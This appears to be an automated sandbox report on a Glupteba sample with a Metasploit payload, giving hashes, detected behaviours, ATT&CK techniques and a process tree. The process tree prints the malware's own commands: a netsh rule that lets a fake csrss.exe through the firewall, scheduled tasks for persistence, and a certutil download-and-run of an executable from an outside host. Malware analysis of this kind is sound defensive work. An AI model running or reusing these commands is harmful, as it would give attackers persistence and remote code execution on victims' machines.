Analysis

  • max time kernel
    147s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    25-06-2022 03:01

General

  • Target

    3a9047e8ecfff014c2a32954d3b88e84f92f2655c21de6c8808240ff88afc696.exe

  • Size

    3.9MB

  • MD5

    a304fcc7873a037dbaa4750a2708b886

  • SHA1

    527abe28f3bf912694ba2c73c496783faf306fc8

  • SHA256

    3a9047e8ecfff014c2a32954d3b88e84f92f2655c21de6c8808240ff88afc696

  • SHA512

    85e6bf852732c47bf5de9720742d14ca768a9e79494929153c61d806fc0730b2bfb23a62a84125e9951574830460f504d7631bad5aa5bec243d2428d3b2031bd

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 7 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3a9047e8ecfff014c2a32954d3b88e84f92f2655c21de6c8808240ff88afc696.exe
    "C:\Users\Admin\AppData\Local\Temp\3a9047e8ecfff014c2a32954d3b88e84f92f2655c21de6c8808240ff88afc696.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4436
    • C:\Users\Admin\AppData\Local\Temp\3a9047e8ecfff014c2a32954d3b88e84f92f2655c21de6c8808240ff88afc696.exe
      "C:\Users\Admin\AppData\Local\Temp\3a9047e8ecfff014c2a32954d3b88e84f92f2655c21de6c8808240ff88afc696.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2828
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2264
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          PID:224
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Executes dropped EXE
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:916
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:396
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:1392
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          PID:884
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:3500
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4260

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Modify Existing Service

1
T1031

Registry Run Keys / Startup Folder

1
T1060

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
    Filesize

    1.7MB

    MD5

    13aaafe14eb60d6a718230e82c671d57

    SHA1

    e039dd924d12f264521b8e689426fb7ca95a0a7b

    SHA256

    f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

    SHA512

    ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

  • C:\Windows\rss\csrss.exe
    Filesize

    3.9MB

    MD5

    a304fcc7873a037dbaa4750a2708b886

    SHA1

    527abe28f3bf912694ba2c73c496783faf306fc8

    SHA256

    3a9047e8ecfff014c2a32954d3b88e84f92f2655c21de6c8808240ff88afc696

    SHA512

    85e6bf852732c47bf5de9720742d14ca768a9e79494929153c61d806fc0730b2bfb23a62a84125e9951574830460f504d7631bad5aa5bec243d2428d3b2031bd

  • C:\Windows\rss\csrss.exe
    Filesize

    3.9MB

    MD5

    a304fcc7873a037dbaa4750a2708b886

    SHA1

    527abe28f3bf912694ba2c73c496783faf306fc8

    SHA256

    3a9047e8ecfff014c2a32954d3b88e84f92f2655c21de6c8808240ff88afc696

    SHA512

    85e6bf852732c47bf5de9720742d14ca768a9e79494929153c61d806fc0730b2bfb23a62a84125e9951574830460f504d7631bad5aa5bec243d2428d3b2031bd

  • memory/224-136-0x0000000000000000-mapping.dmp
  • memory/396-145-0x0000000000000000-mapping.dmp
  • memory/884-147-0x0000000000000000-mapping.dmp
  • memory/916-139-0x0000000000000000-mapping.dmp
  • memory/916-144-0x0000000000400000-0x0000000000C2E000-memory.dmp
    Filesize

    8.2MB

  • memory/916-150-0x0000000000400000-0x0000000000C2E000-memory.dmp
    Filesize

    8.2MB

  • memory/916-142-0x0000000002E00000-0x00000000031A8000-memory.dmp
    Filesize

    3.7MB

  • memory/1392-146-0x0000000000000000-mapping.dmp
  • memory/2264-135-0x0000000000000000-mapping.dmp
  • memory/2828-137-0x0000000002A4C000-0x0000000002DF4000-memory.dmp
    Filesize

    3.7MB

  • memory/2828-133-0x0000000000000000-mapping.dmp
  • memory/2828-143-0x0000000000400000-0x0000000000C2E000-memory.dmp
    Filesize

    8.2MB

  • memory/2828-138-0x0000000000400000-0x0000000000C2E000-memory.dmp
    Filesize

    8.2MB

  • memory/3500-149-0x0000000000000000-mapping.dmp
  • memory/4436-132-0x0000000000400000-0x0000000000C2E000-memory.dmp
    Filesize

    8.2MB

  • memory/4436-130-0x0000000002B73000-0x0000000002F1B000-memory.dmp
    Filesize

    3.7MB

  • memory/4436-134-0x0000000000400000-0x0000000000C2E000-memory.dmp
    Filesize

    8.2MB

  • memory/4436-131-0x0000000002F20000-0x0000000003724000-memory.dmp
    Filesize

    8.0MB